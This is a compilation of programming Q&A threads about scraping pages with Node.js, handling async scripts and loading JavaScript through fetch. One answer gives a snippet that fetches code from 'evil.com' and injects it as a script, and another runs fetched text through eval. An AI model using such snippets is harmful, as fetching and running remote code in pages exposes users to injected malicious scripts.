I'm downloading a webpage using the request module which is very straight forward.
My problem is that the page I'm trying to download has some async scripts (have the async attributes) and they're not downloaded with the html document return from the http request.
My question is how I can make an http request with/with-out (preferably with) request module, and have the WHOLE page download without exceptions as described above due to some edge cases.
Sounds like you are trying to do webscraping using Javascript.
Using request is a very fundemental approach which may be too low-level and tiome consuming for your needs. The topic is pretty broad but you should look into more purpose built modules such as cheerio, x-ray and nightmare.
x-ray x-ray will let you select elements directly from the page in a jquery like way instead of parsing the whole body.
nightmare provides a modern headless browser which makes it possible for you to enter input as though using the browser manually. With this you should be able to better handle the ajax type requests which are causing you problems.
HTH and good luck!
Using only request you could try the following approach to pull the async scripts.
Note: I have tested this with a very basic set up and there is work to be done to make it robust. However, it worked for me:
Test setup
To set up the test I create a html file which includes a script in the body like this: <script src="abc.js" async></script>
Then create temporary server to launch it (httpster)
Scraper
"use strict";
const request = require('request');
const options1 = { url: 'http://localhost:3333/' }
// hard coded script name for test purposes
const options2 = { url: 'http://localhost:3333/abc.js' }
let htmlData // store html page here
request.get(options1)
.on('response', resp => resp.on('data', d => htmlData += d))
.on('end', () => {
let scripts; // store scripts here
// htmlData contains webpage
// Use xml parser to find all script tags with async tags
// and their base urls
// NOT DONE FOR THIS EXAMPLE
request.get(options2)
.on('response', resp => resp.on('data', d => scripts += d))
.on('end', () => {
let allData = htmlData.toString() + scripts.toString();
console.log(allData);
})
.on('error', err => console.log(err))
})
.on('error', err => console.log(err))
This basic example works. You will need to find all js scripts on the page and extract the url part which I have not done here.
Related
I'm new to Web Development (including JavaScript and HTML) and have a few issues within my personal project that seem to have no clear fixes.
Overview
My project is taking input from a user on the website, and feeding it to my back-end to output a list of word completion suggestions.
For example, input => "bass", then the program would suggest "bassist", "bassa", "bassalia", "bassalian", "bassalan", etc. as possible completions for the pattern "bass" (these are words extracted from an English dictionary text file).
The backend - running on Node JS libraries
trie.js file:
/* code for the trie not fully shown */
var Deque = require("collections/deque"); // to be used somewhere
function add_word_to_trie(word) { ... }
function get_words_matching_pattern(pattern, number_to_get = DEFAULT_FETCH) { ... }
// read in words from English dictionary
var file = require('fs');
const DICTIONARY = 'somefile.txt';
function preprocess() {
file.readFileSync(DICTIONARY, 'utf-8')
.split('\n')
.forEach( (item) => {
add_word_to_trie(item.replace(/\r?\n|\r/g, ""));
});
}
preprocess();
module.exports = get_words_matching_trie;
The frontend
An HTML script that renders the visuals for the website, as well as getting input from the user and passing it onto the backend script for getting possible suggestions. It looks something like this:
index.html script:
<!DOCTYPE HTML>
<html>
<!-- code for formatting website and headers not shown -->
<body>
<script src = "./trie.js">
function get_predicted_text() {
const autofill_options = get_words_matching_pattern(input.value);
/* add the first suggestion we get from the autofill options to the user's input
arbitrary, because I couldn't get this to actually work. Actual version of
autofill would be more sophisticated. */
document.querySelector("input").value += autofill_options[0];
}
</script>
<input placeholder="Enter text..." oninput="get_predicted_text()">
<!-- I get a runtime error here saying that get_predicted_text is not defined -->
</body>
</html>
Errors I get
Firstly, I get the obvious error of 'require()' being undefined on the client-side. This, I fix using browserify.
Secondly, there is the issue of 'fs' not existing on the client-side, for being a node.js module. I have tried running the trie.js file using node and treating it with some server-side code:
function respond_to_user_input() {
fs.readFile('./index.html', null, (err, html) => {
if (err) throw err;
http.createServer( (request, response) => {
response.write(html);
response.end();
}).listen(PORT);
});
respond_to_user_input();
}
With this, I'm not exactly sure how to edit document elements, such as changing input.value in index.html, or calling the oninput event listener within the input field. Also, my CSS formatting script is not called if I invoke the HTML file through node trie.js command in terminal.
This leaves me with the question: is it even possible to run index.html directly (through Google Chrome) and have it use node JS modules when it calls the trie.js script? Can the server-side code I described above with the HTTP module, how can I fix the issues of invoking my external CSS script (which my HTML file sends an href to) and accessing document.querySelector("input") to edit my input field?
I am writing an application in node.js that will navigate to a website, click a button on the website, and then extract certain pieces of data from the website. All is going well except for the button-clicking aspect. I cannot seem to simulate a button click. I'm extremely new at this, so I'd appreciate any suggestions y'all have! Sadly I've scoured the internet looking for a solution to this issue and have been unable to find one.
I have used .click() and .bind('click, ...) in a .js file that uses 'request' and 'cheerio'.
I have also tried using page.click() and page.evaluate() in a different .js file that uses 'chrome-launcher', 'chrome-remote-interface', and 'puppeteer'.
Here is my code for the 'request' and 'cheerio' file:
const request = require('request');
const cheerio = require('cheerio');
let p1 = {}, p2 = {}, p3 = {}, p4 = {}, p5 = {};
p1.name = 'TheJackal666';
p2.name = 'Naether Raviel';
p3.name = 'qman37';
p4.name = 'ranger51';
p5.name = 'fernanda12x';
const team = {1: p1, 2: p2, 3: p3, 4: p4, 5: p5};
for(var x in team){
let url = 'https://na.op.gg/summoner/userName=' +
team[x].name;
request(url, (error, response, html) => {
if (!error && response.statusCode == 200) {
const $ = cheerio.load(html);
$('.SummonerRefreshButton.Button.SemiRound.Blue').click();
//FIXME: MAKE A FUNCTION THAT SUCCESSFULLY "CLICKS" UPDATE BUTTON
team[x].overallWR = $('.winratio');
team[x].overallWR =
team[x].overallWR.text().match(/\d/g);
team[x].overallWR =
team[x].overallWR.join("");
console.log(team[x].overallWR);
}
});
}
I expect to successfully click the update button on any of the pages (there is a section on the page that says when it was last updated) without getting an error. As it is, I either get an error that:
"$(...).click is not a function"
or (if I incorporate that line into an outer function) I get no error, but no result.
See the documentation:
Cheerio is not a web browser
Cheerio parses markup and provides an API for traversing/manipulating the resulting data structure. It does not interpret the result as a web browser does. Specifically, it does not produce a visual rendering, apply CSS, load external resources, or execute JavaScript. If your use case requires any of this functionality, you should consider projects like PhantomJS or JSDom.
Cheerio is a HTML parser.
Cheerio can be used to select and manipulate dom elements, but it is not a full browser.
Cheerio only has access to the original source dom, which means that if the dom of a webpage is manipulated by javascript, Cheerio will not notice that change.
Cheerio cannot be used to interact with dom elements (ala jQuery) because it does not similarly execute within a window (js window)
As of this moment, if you need to manipulate or select against js-rendered html, your best option is puppeteer. This is likely to change though,
HTH
Lower intermediate JS/JQ person here.
I'm trying to escape callback hell by using JS fetch. This is billed as "the replacement for AJAX" and seems to be pretty powerful. I can see how you can get HTML and JSON objects with it... but is it capable of running another JS script from the one you're in? Maybe there's another new function in ES6 to do:
$.getScript( 'xxx.js' );
i.e.
$.ajax({ url : 'xxx.js', dataType : "script", });
...?
later, response to Joseph The Dreamer:
Tried this:
const createdScript = $(document.createElement('script')).attr('src', 'generic.js');
fetch( createdScript )...
... it didn't run the script "generic.js". Did you mean something else?
Fetch API is supposed to provide promise-based API to fetch remote data. Loading random remote script is not AJAX - even if jQuery.ajax is capable of that. It won't be handled by Fetch API.
Script can be appended dynamically and wrapped with a promise:
const scriptPromise = new Promise((resolve, reject) => {
const script = document.createElement('script');
document.body.appendChild(script);
script.onload = resolve;
script.onerror = reject;
script.async = true;
script.src = 'foo.js';
});
scriptPromise.then(() => { ... });
SystemJS is supposed to provide promise-based API for script loading and can be used as well:
System.config({
meta: {
'*': { format: 'global' }
}
});
System.import('foo.js').then(() => { ... });
There are a few things to mention on here.
Yes, it is possible to execute a javascript just loaded from the server. You can fetch the file as text and user eval(...) while this is not recommended because of untrackeable side effects and lack of security!
Another option would be:
1. Load the javascript file
2. Create a script tag with the file contents (or url, since the browser caches the file)
This works, but it may not free you from callback hell perse.
If what you want is load other javascript files dinamically you can use, for example requirejs, you can define modules and load them dinamically. Take a look at http://requirejs.org/
If you really want to get out of the callback hell, what you need to do is
Define functions (you can have them in the same file or load from another file using requirejs in the client, or webpack if you can afford a compilation before deployment)
Use promises or streams if needed (see Rxjs https://github.com/Reactive-Extensions/RxJS)
Remember that promise.then returns a promise
someAsyncThing()
.then(doSomethingAndResolveAnotherAsncThing)
.then(doSomethingAsyncAgain)
Remember that promises can be composed
Promise.all(somePromise, anotherPromise, fetchFromServer)
.then(doSomethingWhenAllOfThoseAreResolved)
yes u can
<script>
fetch('https://evil.com/1.txt').then(function(response) {
if (!response.ok) {
return false;
}
return response.blob();
}) .then(function(myBlob) {
var objectURL = URL.createObjectURL(myBlob);
var sc = document.createElement("script");
sc.setAttribute("src", objectURL);
sc.setAttribute("type", "text/javascript");
document.head.appendChild(sc);
})
</script>
dont listen to the selected "right" answer.
Following fetch() Api works perfectly well for me, as proposed by answer of #cnexans (using .text() and then .eval()). I noticed an increased performance compared to method of adding the <script> tag.
Run code snippet to see the fetch() API loading async (as it is a Promise):
// Loading moment.min.js as sample script
// only use eval() for sites you trust
fetch('https://momentjs.com/downloads/moment.min.js')
.then(response => response.text())
.then(txt => eval(txt))
.then(() => {
document.getElementById('status').innerHTML = 'moment.min.js loaded'
// now you can use the script
document.getElementById('today').innerHTML = moment().format('dddd');
document.getElementById('today').style.color = 'green';
})
#today {
color: orange;
}
<div id='status'>loading 'moment.min.js' ...</div>
<br>
<div id='today'>please wait ...</div>
The Fetch API provides an interface for fetching resources (including across the network). It will seem familiar to anyone who has used XMLHttpRequest, but the new API provides a more powerful and flexible feature set. https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
That's what it's supposed to do, but unfortunately it doesn't evaluate the script.
That's why I released this tiny Fetch data loader on Github.
It loads the fetched content into a target container and run its scripts (without using the evil eval() function.
A demo is available here: https://www.ajax-fetch-data-loader.miglisoft.com
Here's a sample code:
<script>
document.addEventListener('DOMContentLoaded', function(event) {
fetch('ajax-content.php')
.then(function (response) {
return response.text()
})
.then(function (html) {
console.info('content has been fetched from data.html');
loadData(html, '#ajax-target').then(function (html) {
console.info('I\'m a callback');
})
}).catch((error) => {
console.log(error);
});
});
</script>
I know that this could be a very stupid question, but, since I'm totally new to Javascript, I'm not sure about how to do this. I want to write a script and run it through node on my laptop, and, in this script, I want to interact with a web page in order to use functions like document.getElementById and stuff like that.
In Python one could do this by using something like Beautiful Soup or requests, but how do you do this in Javascript?
I have implemented a crawler using cheerio and request-promise as follows:
https://www.npmjs.com/package/cheerio
let request = require('request-promise');
let cheerio = require('cheerio');
request = request.defaults({
transform: function (body) {
return cheerio.load(body);
}
});
// ... omitted
request({uri: 'http://example.org'})
.then($ => {
const element = $('.element-with-class');
});
I've seen some answers to this that refer the askee to other libraries (like phantom.js), but I'm here wondering if it is at all possible to do this in just node.js?
Considering my code below. It requests a webpage using request, then using cheerio it explores the dom to scrape the page for data. It works flawlessly and if everything had gone as planned, I believe it would have outputted a file as i imagined in my head.
The problem is that the page I am requesting in order to scrape, build the table im looking at asynchronously using either ajax or jsonp, i'm not entirely sure how .jsp pages work.
So here I am trying to find a way to "wait" for this data to load before I scrape the data for my new file.
var cheerio = require('cheerio'),
request = require('request'),
fs = require('fs');
// Go to the page in question
request({
method: 'GET',
url: 'http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp'
}, function(err, response, body) {
if (err) return console.error(err);
// Tell Cherrio to load the HTML
$ = cheerio.load(body);
// Create an empty object to write to the file later
var toSort = {}
// Itterate over DOM and fill the toSort object
$('#emb table td.list_right').each(function() {
var row = $(this).parent();
toSort[$(this).text()] = {
[$("#lastdate").text()]: $(row).find(".idx1").html(),
[$("#currdate").text()]: $(row).find(".idx2").html()
}
});
//Write/overwrite a new file
var stream = fs.createWriteStream("/tmp/shipping.txt");
var toWrite = "";
stream.once('open', function(fd) {
toWrite += "{\r\n"
for(i in toSort){
toWrite += "\t" + i + ": { \r\n";
for(j in toSort[i]){
toWrite += "\t\t" + j + ":" + toSort[i][j] + ",\r\n";
}
toWrite += "\t" + "}, \r\n";
}
toWrite += "}"
stream.write(toWrite)
stream.end();
});
});
The expected result is a text file with information formatted like a JSON object.
It should look something like different instances of this
"QINHUANGDAO - GUANGZHOU (50,000-60,000DWT)": {
"2016-09-29": 26.7,
"2016-09-30": 26.8,
},
But since the name is the only thing that doesn't load async, (the dates and values are async) I get a messed up object.
I tried Actually just setting a setTimeout in various places in the code. The script will only be touched by developers that can afford to run the script several times if it fails a few times. So while not ideal, even a setTimeout (up to maybe 5 seconds) would be good enough.
It turns out the settimeouts don't work. I suspect that once I request the page, I'm stuck with the snapshot of the page "as is" when I receive it, and I'm in fact not looking at a live thing I can wait for to load its dynamic content.
I've wondered investigating how to intercept the packages as they come, but I don't understand HTTP well enough to know where to start.
The setTimeout will not make any difference even if you increase it to an hour. The problem here is that you are making a request against this url:
http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp
and their server returns back the html and in this html there are the js and css imports. This is the end of your case, you just have the html and that's it. Instead the browser knows how to use and to parse the html document, so it is able to understand the javascript scripts and to execute/run them and this is exactly your problem. Your program is not able to understand that has something to do with the HTML contents. You need to find or to write a scraper that is able to run javascript. I just found this similar issue on stackoverflow:
Web-scraping JavaScript page with Python
The guy there suggests https://github.com/niklasb/dryscrape and it seems that this tool is able to run javascript. It is written in python though.
You are trying to scrape the original page that doesn't include the data you need.
When the page is loaded, browser evaluates JS code it includes, and this code knows where and how to get the data.
The first option is to evaluate the same code, like PhantomJS do.
The other (and you seem to be interested in it) is to investigate the page's network activity and to understand what additional requests you should perform to get the data you need.
In your case, these are:
http://index.chineseshipping.com.cn/servlet/cbfiDailyGetContrast?SpecifiedDate=&jc=jsonp1475577615267&_=1475577619626
and
http://index.chineseshipping.com.cn/servlet/allGetCurrentComposites?date=Tue%20Oct%2004%202016%2013:40:20%20GMT+0300%20(MSK)&jc=jsonp1475577615268&_=1475577620325
In both requests:
_ is a decache parameter to prevent caching.
jc is a name of a JS wrapper function which should be invoked with the result (https://en.wikipedia.org/wiki/JSONP)
So, scrapping the table template at http://www1.chineseshipping.com.cn/en/indices/cbcfinew.jsp and performing two additional requests you will be able to combine them into the same data structure you see in the browser.